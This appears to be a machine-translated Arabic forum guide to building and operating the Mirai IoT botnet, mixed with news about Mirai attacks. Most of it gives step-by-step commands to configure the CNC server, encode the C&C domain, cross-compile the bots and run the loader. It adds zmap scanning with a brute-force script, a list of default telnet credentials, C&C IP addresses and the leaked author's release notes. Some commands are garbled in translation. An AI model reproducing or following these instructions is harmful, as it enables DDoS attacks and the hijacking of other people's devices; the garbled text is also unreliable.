كود مصدر ميراي. تركيب وتكوين شبكة الروبوتات Mirai. مبدأ تشغيل ميراي

يعمل Mirai في جوهره ببساطة: فهو يقوم بمسح الإنترنت بحثًا عن أجهزة إنترنت الأشياء التي يمكن الوصول إليها عبر telnet والتي تكون عرضة للقوة الغاشمة والقرصنة. تهاجم البرامج الضارة في المقام الأول كاميرات المراقبة ومسجلات الفيديو الرقمية وأجهزة التوجيه، ثم تستمر في التكاثر مثل الدودة.

من هجمات DDoS التي نفذتها هذه الشبكة مؤخرًا والأكبر في أوروبا. وصلت قوة الهجوم القصوى إلى 620 جيجابت/ثانية وأكثر من 1 تيرابايت/ثانية. ولتحقيق هذه النتائج، استخدم المهاجمون تدفقات UDP وDNS وHTTP، بالإضافة إلى حزم GRE (تغليف التوجيه العام)، والتي اعتبرها الخبراء غير عادية إلى حد كبير.

تتطابق استنتاجات متخصصي MalwareTech عمومًا مع هذه الملاحظات. لذلك، على مدار اثنتي عشرة ساعة، سجل الباحثون حوالي 72000 عنوان IP فريد، وظهر 4000 عنوان IP جديد كل ساعة. ومن هذا المنطلق، خلص المحللون إلى أن حجم شبكة الروبوتات متواضع للغاية - حوالي 120 ألف جهاز فقط يوميًا. وعلى الرغم من أن شبكة الروبوتات أكبر بكثير وأن الأرقام تتراوح ما بين 1 إلى 1.5 مليون روبوت، إلا أن لا باحثي MalwareTech ولا المتخصصين في Akamai يوافقون على ذلك.

وكتب الباحثون: "لقد أصبحت ميراي، التي تم تجاهلها في السابق إلى حد كبير بسبب بساطة هجمات telnet، موضوعًا رئيسيًا للنقاش في وسائل الإعلام حول العالم الأسبوع الماضي، حيث أطلقت وكالات إنفاذ القانون تحقيقات، بدعم من العديد من الشركات العالمية". . "من المحتمل أن تصبح هجمات DDoS القوية الآن أكثر شيوعًا حيث يعثر المتسللون على المزيد والمزيد من أجهزة إنترنت الأشياء المعرضة للخطر أو يبدأون في إصابة الأجهزة المحمية بـ NAT. لقد حان الوقت بالتأكيد لكي تتوقف الشركات المصنعة عن إصدار الأجهزة بكلمات مرور عالمية بشكل افتراضي والتحول إلى إطلاق الأجهزة بكلمات مرور يتم إنشاؤها عشوائيًا في الجزء السفلي من العلبة."

بالإضافة إلى التقرير، قام باحثو MalwareTech بتضمين مقطع فيديو يظهر خريطة لعدوى Mirai (انظر أدناه). يمكنك أيضًا العثور على موقع الباحثين على خريطة تفاعلية لشبكة الروبوتات، والتي يتم تحديثها في الوقت الفعلي.

سنحتاج إلى خادمين VPS KVM ومجال. المحاكاة الافتراضية هي KVM، لكن OpenVZ مفقود هذه المرة.

أنا آخذ الخوادم هنا -

سنقوم بتثبيت شبكة الروبوتات نفسها على خادم واحد، وفحص الروبوتات على الخادم الثاني. (قاسِي)

مهم. يجب أن تعتمد الخوادم على Debian 8 وأن تحتوي على ذاكرة وصول عشوائي (RAM) سعة 1 جيجابايت على الأقل.

أي مجال، لا يهم.

آسف، بالطبع، لكنني لن أخبرك بكيفية ربط نطاق بخادم VPS. الأمر ليس صعبًا، ستكتشفه بنفسك.

المعجونودعنا نبدأ.

#الحصول على التحديث -y

# الرابطة بين الحصول على الترقية -y

# apt-get install unzip gcc golang electric-fence screen sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# الرابطة بين الحصول على تثبيت apache2 -y

عند تثبيت MySQL، ستحتاج إلى إنشاء كلمة مرور للوصول إلى MySQL للمستخدم الجذر. سوف تحصل على كلمة مرور عادية، بدون أي "qwerty"

اكتبه في مكان ما، وسوف نحتاج إليه مرة أخرى.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

#سحق< <(curl -s -S -L

يجب أن تكون مسجلا لرؤية الروابط.

# تثبيت gvm go1.4

# استخدام gvm go1.4 [--افتراضي]

# تثبيت gvm go1.4 -B

# استخدام gvm go1.4

# تصدير GOROOT_BOOTSTRAP=$GOROOT

# تثبيت gvm go1.5

# استخدام gvm go1.5

# تثبيت gvm go1.8

# استخدام gvm go1.8

بعد تثبيت جميع الأدوات المساعدة، قم بتنزيل مصادر الروبوت -

يجب أن تكون مسجلا لرؤية الروابط.

وتحميله على الخادم . فريق wgetأو ببساطة من خلال البرنامج WinSCP.

# فك ضغط Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# دول مجلس التعاون الخليجي enc.c -o enc

# سلسلة ./enc *******(نكتب مجالنا المتصل بالخادم) ثم اضغط على Enter.

هنا سيظهر لك النص التالي -

XOR"14 بايت من البيانات...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - هنا سيكون لديك رقم مختلف، فلا تقلق، كل شيء صحيح.

نحن نسخ كل هذا النص.

افتح عبر محرر nano، أو عبر WinSCPملف الجدول. جالذي هو في المجلد ميري/بوت

يجب أن نرى هذا -

يجب أن تكون مسجلا لرؤية الروابط.

خط add_entry(TABLE_CNC_DOMAIN- قم بتغيير كل شيء بين علامات الاقتباس إلى النص الذي قمت بنسخه للتو. بدلاً من " 30 " نكتب رقمنا، الذي نسخناه للتو أيضًا. نحن نفعل الشيء نفسه مع الخط add_entry(TABLE_SCAN_CB_DOMAIN

احفظ وأغلق المحرر.

افتح الملف باستخدام المحرر ميراي/cnc/main.go

نحن نرى هذا -

يجب أن تكون مسجلا لرؤية الروابط.

"127.0.0.1" تغيير ل "127.0.0.1:3306"

"كلمة المرور"نقوم بتغيير كلمة المرور التي أدخلناها سابقًا إلى MySQL. "

احفظ الملف وأغلق المحرر.

فقط انسخ كل هذا الهراء، ولن أخبرك عن سبب الحاجة إليه -

# mkdir /etc/xcompile

# القرص المضغوط /etc/xcompile

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

#wget

يجب أن تكون مسجلا لرؤية الروابط.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l Armv4l

# mv cross-compiler-i586 i586

#mv crosscompiler-m68k m68k

# mv cross-compiler-mips mips

# mv عبر المترجم-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv crosscompiler-sh4 sh4

# mv cross-compiler-sparc

# mv cross-compiler-armv6l Armv6l

# تصدير PATH=$PATH:/etc/xcompile/armv4l/bin

# تصدير PATH=$PATH:/etc/xcompile/i586/bin

# تصدير PATH=$PATH:/etc/xcompile/m68k/bin

# تصدير PATH=$PATH:/etc/xcompile/mips/bin

# تصدير PATH=$PATH:/etc/xcompile/mipsel/bin

# تصدير PATH=$PATH:/etc/xcompile/powerpc/bin

# تصدير PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# تصدير PATH=$PATH:/etc/xcompile/sh4/bin

# تصدير PATH=$PATH:/etc/xcompile/sparc/bin

# تصدير PATH=$PATH:/etc/xcompile/armv6l/bin

# تصدير PATH=$PATH:/usr/local/go/bin

# تصدير GOPATH=$HOME/Documents/go

# اذهب واحصل على github.com/go-sql-driver/mysql

# اذهب واحصل على github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master/mirai

# ./build.sh تصحيح أخطاء التلنت

# ./build.sh إطلاق التلنت

# mv ميراي* /var/www/html

#cd /var/www/html

#mkdirbins

#م*صناديق/

الآن ماي إس كيو إل.

# الخلية -u الجذر -p

هنا سوف يطلب منك كلمة المرور. أدخل كلمة المرور التي قمت بتعيينها مسبقًا.

# إنشاء قاعدة بيانات ميراي؛

# استخدم ميراي

الآن انسخ النص بالكامل من هنا -

يجب أن تكون مسجلا لرؤية الروابط.

الصقها واضغط على Enter.

انسخ النص من هنا -

يجب أن تكون مسجلا لرؤية الروابط.

بدلاً من آنا سينباياكتب تسجيل الدخول الخاص بك. أي. الشيء نفسه مع كلمة المرور الخاصة بي. سنحتاج إلى هذه البيانات للوصول إلى لوحة تحكم الروبوت.

ينبغي أن يكون مثل هذا - إدراج في قيم المستخدمين (NULL، "pizdec"، "zaebalsjapisatj"، 0، 0، 0، 0، -1، 1، 30، "")؛

انسخ، الصق، اضغط على Enter.

الآن يمكنك الخروج.

أوشكت على الإنتهاء.

# cd Mirai-Source-Code-master/mirai/release

# المس المطالبة.txt

#شاشة ./cnc

يجب أن نرى النقش تم فتح قاعدة بيانات MySQL

نحن لا نغلق هذه الجلسة، بل نفتح جلسة جديدة.

يجب أن تكون مسجلا لرؤية الروابط.

بدلاً من *******، اكتب المجال الخاص بك وانقر فوق فتح.

أدخل اسم المستخدم وكلمة المرور الخاصة بك، في حالتي -

zaebalsjapisatj

هذا كل شيء، نحن في لوحة تحكم الروبوت.

الآن نحن بحاجة إلى الروبوتات. كل شيء بسيط هنا، لا حاجة للتثبيت.

دعونا تكوين محمل.

هناك حاجة إلى أداة التحميل حتى يمكن إضافة الروبوتات من الملفات النصية. لنفترض أننا أنشأنا مجموعة من الأجهزة (أجهزة التوجيه والكاميرات والهواتف) ولإضافتها إلى الروبوت، نحتاج إلى أداة تحميل.

كما أن اللودر عبارة عن "دودة"

اتصل بخادمنا عبر المعجون و WinSCP.

باستخدام WinSCP نجد الملف ج الرئيسيةفي المجلد Mirai-Source-Code-master/dlr

نكتب IP الخاص بخادمنا كما في لقطة الشاشة -

يجب أن تكون مسجلا لرؤية الروابط.

نترك الفواصل، هكذا ينبغي أن تكون. حفظ وإغلاق.

الان مع بيتياذهب إلى خادمنا واكتب -

# cd Mirai-Source-Code-master/dlr

#شمود 777 *

# ./build.sh

#إصدار القرص المضغوط

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

الآن دعونا نفتح WinSCPوابحث عن الملف ج الرئيسيةفي المجلد Mirai-Source-Code-master/loader/src

نقوم بتغييره إلى IP الخاص بنا كما في لقطة الشاشة -

يجب أن تكون مسجلا لرؤية الروابط.

حفظ وإغلاق.

خلال المعجون -

# ./build.sh

باستخدام WinSCPافتح الملف scanListen.goوالتي يمكن العثور عليها في المجلد Mirai-Source-Code-master/mirai/tools

التغيير إلى IP الخادم الخاص بك -

يجب أن تكون مسجلا لرؤية الروابط.

ثم مع بيتي -

# cd Mirai-Source-Code-master/mirai/tools

# اذهب لبناء scanListen.go

والآن لدينا ملف جديد scanListen(بدون .يذهب، فقط scanListen)

scanListenتحتاج إلى نقلها إلى مجلد Mirai-Source-Code-master/loader

فقط بالمساعدة WinSCPوضعه في مجلد محمل

الآن دعونا نتحقق مما إذا كان كل شيء يعمل

# ./محمل

إذا رأيت ما يظهر على الشاشة، فكل شيء صحيح -

يجب أن تكون مسجلا لرؤية الروابط.

في حالة حدوث أخطاء، اكتب إلى الموضوع، وسوف أساعد.

لتنزيل برامج الروبوت من القائمة، قم بإسقاط الملف النصي في المجلد محملواكتب الأمر -

# قائمة القطط.txt | ./محمل

هذا كل شيء، جميع الروبوتات التي قمت بتجنيدها ستكون معك، وستقوم بتعطيل المواقع حسب أمرك.

أنا شخصياً لم أستخدم هذه الطريقة، لقد وجدت طريقة أسهل.

نحن هنا بحاجة إلى خادم ثان. أيضا على ديبيان 8.

#الحصول على التحديث -y

# الرابطة بين الحصول على الترقية -y

# apt-get install python-paramiko -y

# الرابطة بين الحصول على تثبيت zmap -y

com.zmapنحن في حاجة إليها لمسح المنفذ. مبدأ التشغيل هو نفسه KPortScanأسرع بـ 50 مرة فقط.

انسخ الكود بالكامل من هنا -

يجب أن تكون مسجلا لرؤية الروابط.

وحفظ باسم scan.py

هنا يمكنك إضافة كلمات المرور وتسجيلات الدخول الخاصة بك -

يجب أن تكون مسجلا لرؤية الروابط.

خيط التحرير والسردلا تلمس!

تحتاج هنا إلى تسجيل IP الخاص بالخادم الذي يوجد عليه الروبوت -

يجب أن تكون مسجلا لرؤية الروابط.

نحن نغير كل شيء ونحفظه.

نقوم بإسقاط ملف scan.py في أي مكان على خادمنا. على الخادم الثاني، وهو مخصص للمسح فقط، وهو الخادم الذي لا نلمس الروبوت عليه.

نحن بحاجة إلى عناوين IP التي سنقوم بمسحها.

#zmap -p22 -o list.txt -B 100M(يمكنك فحص المنافذ الأخرى، لقد قمت دائمًا بفحص 22 أو 23)

جميع النتائج ستكون في الملف list.txt

بعد جمع ملف IP (كلما كان ذلك أفضل كلما كان ذلك أفضل). list.txtرميها بجانب الملف scan.pyواكتب -

# بيثون scan.py list.txt 500

هذا كل شيء، نجلس ونشاهد كيف تنمو شبكة الروبوتات الخاصة بنا.

عندما يكون هناك ما لا يقل عن 200 روبوت، يمكنك تشغيل أداة التحميل.

للقيام بذلك، انتقل إلى الخادم حيث تم تثبيت الروبوتات و-

# cd Mirai-Source-Code-master/loader

# أوليميت -ن 9999999

# ./scanListen | ./محمل

الآن سيعمل الروبوت مثل "الدودة" ويقضي على المزيد من الروبوتات.

في الأسبوع الماضي، تم تسريب الكود المصدري لمكونات شبكة الروبوتات Mirai، المستخدمة في هجمات DDoS التي حطمت الأرقام القياسية بسعة تصل إلى 1 تيرابايت في الثانية، عبر الإنترنت.

فن. 273 من القانون الجنائي للاتحاد الروسي. إنشاء واستخدام وتوزيع برامج الكمبيوتر الضارة

1. إنشاء أو توزيع أو استخدام برامج كمبيوتر أو معلومات كمبيوتر أخرى، بقصد التدمير غير المصرح به أو حظر أو تعديل أو نسخ معلومات الكمبيوتر أو تحييد وسائل حماية معلومات الكمبيوتر، -

يعاقب بتقييد الحرية لمدة تصل إلى أربع سنوات، أو العمل القسري لمدة تصل إلى أربع سنوات، أو السجن لنفس المدة مع غرامة تصل إلى مائتي ألف روبل أو في مبلغ الأجور أو الدخل الآخر للشخص المدان لمدة تصل إلى ثمانية عشر شهرًا.

2. الأفعال المنصوص عليها في الجزء الأول من هذه المادة، التي ترتكب من قبل مجموعة من الأشخاص بمؤامرة سابقة أو من قبل مجموعة منظمة أو من قبل شخص يستخدم مركزه الرسمي، وكذلك تلك التي أحدثت أضرارا جسيمة أو ارتكبت لمصلحة أنانية. ، -

يعاقب بتقييد الحرية لمدة تصل إلى أربع سنوات، أو العمل القسري لمدة تصل إلى خمس سنوات مع الحرمان من الحق في شغل مناصب معينة أو المشاركة في أنشطة معينة لمدة تصل إلى ثلاث سنوات أو بدونها، أو السجن لمدة تصل إلى خمس سنوات مع غرامة قدرها مائة ألف إلى مائتي ألف روبل أو بمبلغ الأجور أو الدخل الآخر للشخص المدان لمدة سنتين إلى ثلاث سنوات أو بدونها و مع أو بدون الحرمان من الحق في شغل مناصب معينة أو المشاركة في أنشطة معينة لمدة تصل إلى ثلاث سنوات.

3. الأفعال المنصوص عليها في الباب الأول أو الثاني من هذه المادة، إذا كانت تترتب عليها عواقب وخيمة أو تهدد بوقوعها، -

يعاقب بالسجن لمدة تصل إلى سبع سنوات.

يتكون هذا الروبوت بشكل أساسي من الكاميرات وأجهزة DVR وما إلى ذلك.

تحدث الإصابة بكل بساطة: يتم فحص الإنترنت بحثًا عن منافذ 80/23 (ويب/تلنت) مفتوحة ويتم تحديد الحسابات المشفرة.

يقوم عدد قليل من المستخدمين بتغيير كلمات المرور الخاصة بحساباتهم المدمجة (إن أمكن)، لذلك يتم تجديد شبكة الروبوتات باستمرار بأجهزة جديدة. إذا كان بإمكانك تغيير كلمة المرور الخاصة بواجهة الويب أثناء وجودك فيها، فإن كلمة المرور ووجود الوصول إلى Telnet ببساطة بعيد المنال عن العديد من المستخدمين.

الحسابات الأكثر استخدامًا هي:

تمكين: النظام
قذيفة: ش
المشرف: المشرف
الجذر:xc3511
الجذر:vizxv
الجذر:admin
الجذر:xmhdipc
الجذر:123456
الجذر:888888
دعم دعم
الجذر:54321
الجذر: جوانتك
الجذر:أنكو
الجذر:12345
مسؤل:
الجذر:افتراضي
كلمة سر المشرف
الجذر:الجذر
جذر:
المستخدم: المستخدم
المشرف:smcadmin
تمرير الجذر
المشرف: admin1234
الجذر:1111
الضيف:12345
الجذر:1234
الجذر:كلمة المرور
الجذر:666666
المشرف:1111
الخدمة: الخدمة
نظام الجذر
المشرف: المشرف
الجذر: klv1234
المسؤول:1234
الجذر:ikwb
الجذر: زد تي 521

بعد الحصول على حق الوصول، يتلقى مركز القيادة إشعارًا ثنائيًا حول وجود روبوت جديد:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (كان عنوان المضيف هنا)
05 = علامة التبويب
17 = 23 (منفذ 23 تلنت)
05 = علامة التبويب
61 64 6d 69 6e = اسم المستخدم:admin admin
05= علامة التبويب
61 64 6d 69 6e = كلمة مرور المستخدم: admin

تم تصميم مكونات الروبوتات للعمل في بيئات مختلفة، كما يتضح من العينات المحددة:

mirai.arm
ميراي.arm7
mira.mips
mirai.ppc
ميراي.sh4

توجد خوادم الأوامر حاليًا على العناوين التالية:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

تعليمات إنشاء الروبوتات بسيطة للغاية، إليك ما هي عليه (المصدر http://pastebin.com/E90i6yBB):

أهلا بالجميع،

عندما بدأت العمل في مجال DDoS لأول مرة، لم أكن أخطط للبقاء فيه لفترة طويلة. لقد كسبت أموالي، وهناك الكثير من الأنظار تتطلع إلى إنترنت الأشياء الآن، لذا فقد حان الوقت لـ GTFO. ومع ذلك، فأنا أعرف كل من ينزلق ووالدته، فهو حلمهم في الحصول على شيء آخر غير qbot.

لذا، لدي اليوم إصدارًا رائعًا لك. باستخدام Mirai، عادةً ما أقوم بسحب 380 ألف روبوت بحد أقصى من telnet وحده. ومع ذلك، بعد Kreb DDoS، كان مزودو خدمات الإنترنت يقومون بإغلاق أعمالهم ببطء وتنظيف أعمالهم. اليوم، يبلغ الحد الأقصى للسحب حوالي 300 ألف روبوت، وهو في انخفاض.

لذا، أنا الـ senpai الخاص بك، وسوف أعاملك بلطف حقيقي، يا hf-chan.

ولكل من اعتقد أنهم كانوا يفعلون أي شيء عن طريق ضرب CNC الخاص بي، لقد ضحكت كثيرًا، هذا الروبوت يستخدم المجال لـ CNC. يستغرق الأمر 60 ثانية حتى يتم إعادة الاتصال بجميع الروبوتات، هههه

أيضًا، أحيي منشور المدونة هذا بواسطة Malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
أكن لك الكثير من الاحترام، واعتقدت أنك عكسي جيد، ولكنك في الحقيقة فشلت فشلًا ذريعًا في عكس هذا الثنائي. "لا يزال لدينا كونغ فو أفضل منكم يا أطفال" لا تجعلني أضحك من فضلك، لقد ارتكبت الكثير من الأخطاء وحتى الخلط بين بعض الثنائيات المختلفة معي. مضحك جداً

دعني أعيد لك بعض الصفعات -
1) المنفذ 48101 ليس مخصصًا للاتصال الخلفي، بل مخصص للتحكم لمنع مثيلات متعددة من تشغيل الروبوت معًا
2) /dev/watchdog و/dev/misc ليسا من أجل "التأخير"، بل لمنع النظام من التعليق. هذه هي الفاكهة المتدلية، ومن المحزن أنك غبي للغاية
3) لقد فشلت واعتقدت أن FAKE_CNC_ADDR و FAKE_CNC_PORT كانا حقيقيين باستخدام الحاسب الآلي، هههه "وإجراء الباب الخلفي للاتصال عبر HTTP على 65.222.202.53." لقد تعثرت بسبب تدفق الإشارة؛) حاول التزلج بشكل أصعب
4) أداة الهيكل العظمي الخاصة بك سيئة للغاية، حيث اعتقدت أن وحدة فك تشفير الهجوم كانت "بأسلوب Sinden"، ولكنها لا تستخدم حتى بروتوكولًا قائمًا على النص؟ يتواصل CNC وbot عبر بروتوكول ثنائي
5) تقول "chroot("/") يمكن التنبؤ به تمامًا مثل torlus" ولكنك لا تفهم، والبعض الآخر يقتل بناءً على cwd. إنه يُظهر مدى خروجك من الحلقة مع البرامج الضارة الحقيقية. العودة إلى سكيدلاند

لماذا تكتب أدوات الهندسة العكسية؟ لا يمكنك حتى الرجوع بشكل صحيح في المقام الأول. يرجى تعلم بعض المهارات أولاً قبل محاولة إقناع الآخرين. إن غطرستك في إعلان كيف "ضربتني" ببيانك الغبي في الكونغ فو جعلتني أضحك بشدة أثناء تناول الطعام، وكان على SO أن يربت على ظهري.

وكما أنني سأظل حرًا إلى الأبد، فسيكون محكومًا عليك بالتواضع إلى الأبد.

متطلبات
2 خادم: 1 لـ CNC + mysql، 1 لاستقبال المسح الضوئي، و1+ للتحميل

متطلبات البروتوكول الاختياري
2 VPS و 4 خوادم
- 1 VPS مع مضيف مضاد للرصاص للغاية لخادم قاعدة البيانات
- 1 VPS، rootkit، لجهاز الاستقبال والموزع
- خادم واحد لـ CNC (يستخدم مثل 2% من وحدة المعالجة المركزية مع 400 ألف روبوت)
- 3 خوادم NForce بسرعة 10 جيجابت في الثانية للتحميل (يوزع الموزع على 3 خوادم بالتساوي)

- لإنشاء اتصال بـ CNC، تقوم الروبوتات بتحليل المجال (resolv.c/resolv.h) والاتصال بعنوان IP هذا
— تعمل الروبوتات على استخدام telnet باستخدام ماسح ضوئي SYN متقدم أسرع بنحو 80 مرة من ذلك الموجود في qbot، ويستخدم موارد أقل بنحو 20 مرة. عند العثور على نتيجة واضحة، يقوم الروبوت بتحليل مجال آخر والإبلاغ عنه. يتم ربط هذا بخادم منفصل ليتم تحميله تلقائيًا على الأجهزة عند ظهور النتائج.
- يتم إرسال النتائج الأولية بشكل افتراضي على المنفذ 48101. ويتم استخدام الأداة المساعدة التي تسمى scanListen.go في الأدوات لتلقي النتائج الأولية (كنت أحصل على حوالي 500 نتيجة أولية في الثانية في الذروة). إذا قمت بالإنشاء في وضع التصحيح، فيجب أن تشاهد الأداة المساعدة scanListen الثنائية تظهر في مجلد التصحيح.

يستخدم ميراي آلية نشر مشابهة لآلية التمثيل الذاتي، ولكن ما أسميه "التحميل في الوقت الحقيقي". في الأساس، تقوم الروبوتات بتلخيص النتائج وإرسالها إلى خادم يستمع باستخدام الأداة المساعدة scanListen، والتي ترسل النتائج إلى أداة التحميل. تُعرف هذه الحلقة (الغاشمة -> المسح الضوئي -> التحميل -> الغاشمة) بالتحميل في الوقت الفعلي.

يمكن تكوين المُحمل لاستخدام عناوين IP متعددة لتجاوز استنفاد المنافذ في Linux (يوجد عدد محدود من المنافذ المتاحة، مما يعني أنه لا يوجد تباين كافٍ في المجموعة للحصول على أكثر من 65 ألف اتصال صادر متزامن - من الناحية النظرية، هذه القيمة كبيرة أقل). ربما سيكون لدي 60 ألفًا - 70 ألفًا من الاتصالات الصادرة المتزامنة (تحميل متزامن) موزعة على 5 عناوين IP.
يحتوي الروبوت على العديد من خيارات التكوين المبهمة في (table.c/table.h). في ./mirai/bot/table.h أنت تستطيعابحث عن معظم الأوصاف لخيارات التكوين. ومع ذلك، في ./mirai/bot/table.c هناك بعض الخيارات التي *تحتاج* إلى تغييرها للبدء في العمل.

- TABLE_CNC_DOMAIN - اسم مجال CNC للاتصال به - تجنب DDoS ممتع جدًا مع mirai، يحاول الأشخاص الوصول إلى CNC الخاص بي ولكني أقوم بتحديثه بشكل أسرع مما يمكنهم العثور على عناوين IP جديدة، هههه. يتخلف :)
— TABLE_CNC_PORT — المنفذ المراد الاتصال به، تم ضبطه على 23 بالفعل
— TABLE_SCAN_CB_DOMAIN — عند العثور على نتائج مباشرة، يتم الإبلاغ عن هذا النطاق
— TABLE_SCAN_CB_PORT — المنفذ الذي سيتم الاتصال به للحصول على النتائج المباشرة، وقد تم ضبطه على 48101 بالفعل.

في ./mirai/tools ستجد شيئًا يسمى enc.c - يجب عليك تجميعه لإخراج الأشياء لوضعها في ملف table.c

قم بالتشغيل داخل دليل ميراي هذا

./build.sh تصحيح أخطاء telnet

سوف تحصل على بعض الأخطاء المتعلقة بعدم وجود المترجمين المتقاطعين إذا لم تقم بتكوينها. هذا جيد، ولن يؤثر على تجميع أداة enc

الآن، في المجلد ./mirai/debug، من المفترض أن تشاهد ملفًا ثنائيًا مترجمًا يسمى enc. على سبيل المثال، للحصول على سلسلة مبهمة لاسم المجال لبرامج الروبوت للاتصال بها، استخدم هذا:

./debug/enc سلسلة Fuck.the.police.com
يجب أن يبدو الإخراج مثل هذا

XOR's 20 بايت من البيانات...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
لتحديث قيمة TABLE_CNC_DOMAIN على سبيل المثال، استبدل هذه السلسلة السداسية الطويلة بتلك التي توفرها أداة enc. كما ترى "XOR'ing 20 بايت من البيانات". يجب أن تحل هذه القيمة محل الوسيطة الأخيرة أيضًا. على سبيل المثال، يبدو سطر table.c في الأصل بهذا الشكل
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
الآن بعد أن عرفنا القيمة من أداة enc، نقوم بتحديثها على هذا النحو

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22″, 20); //fuck.the.police.com
بعض القيم عبارة عن سلاسل، وبعضها عبارة عن منفذ (uint16 في ترتيب الشبكة / endian الكبير).
تكوين CNC:
apt-get install mysql-server mysql-client

يتطلب CNC قاعدة بيانات للعمل. عند تثبيت قاعدة البيانات، انتقل إليها وقم بتشغيل الأوامر التالية:
http://pastebin.com/86d0iL9g

سيؤدي هذا إلى إنشاء قاعدة بيانات لك. لإضافة المستخدم الخاص بك،

إدراج في قيم المستخدمين (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
الآن قم بالدخول إلى الملف ./mirai/cnc/main.go

تحرير هذه القيم
سلسلة const DatabaseAddr = "127.0.0.1"
سلسلة Const DatabaseUser = "الجذر"
سلسلة const DatabasePass = "كلمة المرور"
سلسلة Const DatabaseTable = "ميراي"
إلى المعلومات ل خادم الخليةقمت بتثبيت للتو

المترجمون المتقاطعون سهلون، اتبع التعليمات الموجودة على هذا الرابط للإعداد. يجب عليك إعادة تشغيل النظام أو إعادة تحميل ملف .bashrc حتى تدخل هذه التغييرات حيز التنفيذ.

http://pastebin.com/1rRCc3aD
CNC والبوت والأدوات ذات الصلة:
http://dopefile.pk/a9f2n9ewk8om
كيفية بناء بوت + CNC
يوجد في مجلد Mirai برنامج نصي build.sh.
./build.sh تصحيح أخطاء telnet

سيتم إخراج ثنائيات تصحيح الأخطاء للروبوت التي لن تقوم بإخفاء وطباعة معلومات حول ما إذا كان بإمكانه الاتصال بـ CNC، وما إلى ذلك، وحالة الفيضانات، وما إلى ذلك. يتم تجميعه إلى مجلد ./mirai/debug
./build.sh الافراج عن التلنت

سيتم إخراج ثنائيات الروبوت الجاهزة للإنتاج والتي تم تجريدها للغاية وصغيرة الحجم (حوالي 60 كيلو بايت) والتي يجب تحميلها على الأجهزة. يجمع كل الثنائيات بالتنسيق: "mirai.$ARCH" إلى مجلد ./mirai/release

يقوم المُحمل بقراءة إدخالات telnet من STDIN بالتنسيق التالي:
الملكية الفكرية: مستخدم المنفذ: تمرير
يكتشف ما إذا كان هناك wget أو tftp، ويحاول تنزيل الملف الثنائي باستخدام ذلك. إذا لم يكن الأمر كذلك، فسيتم تحميل ملف ثنائي صغير (حوالي 1 كيلو بايت) سيكون كافيًا كـ wget.
./build.sh

سيتم بناء المحمل، الأمثل، استخدام الإنتاج، لا ضجة. إذا كان لديك ملف بالتنسيقات المستخدمة للتحميل، فيمكنك القيام بذلك
ملف القط.txt | ./محمل
تذكر أن تحد!

فقط للتوضيح، أنا لا أقدم أي نوع من البرامج التعليمية للمساعدة الفردية أو الهراء، الكثير من الوقت. يتم تضمين جميع البرامج النصية وكل شيء لإعداد شبكة الروبوت العاملة في أقل من ساعة واحدة. أنا على استعداد للمساعدة إذا كانت لديك أسئلة فردية (كيف لا يتصل CNC بقاعدة البيانات، لقد فعلت هذا بلاه بلاه)، ولكن ليس أسئلة مثل "الروبوت الخاص بي لا يتصل، أصلحه"

هذا هو حصان طروادة الذي كتب عنه الجميع خلال الأسابيع القليلة الماضية. ومن بين الإنجازات الأكثر إثارة للإعجاب التي حققتها شبكات الروبوت التي تم إنشاؤها بمساعدتها هي سعة تزيد عن تيرابت وفي دولة أفريقية صغيرة.

كم عدد أجهزة الكمبيوتر التي استعبدها لهذا؟

مُطْلَقاً. أو على الأقل القليل جدا. الأجهزة المستهدفة لـ Mirai ليست أجهزة كمبيوتر على الإطلاق، ولكنها أجهزة إنترنت الأشياء - مسجلات الفيديو والكاميرات والمحامص... وفقًا لإحصائيات شركة Level 3 Communications، بحلول نهاية أكتوبر، كان حوالي نصف مليون جهاز تحت سيطرة حصان طروادة بالفعل.

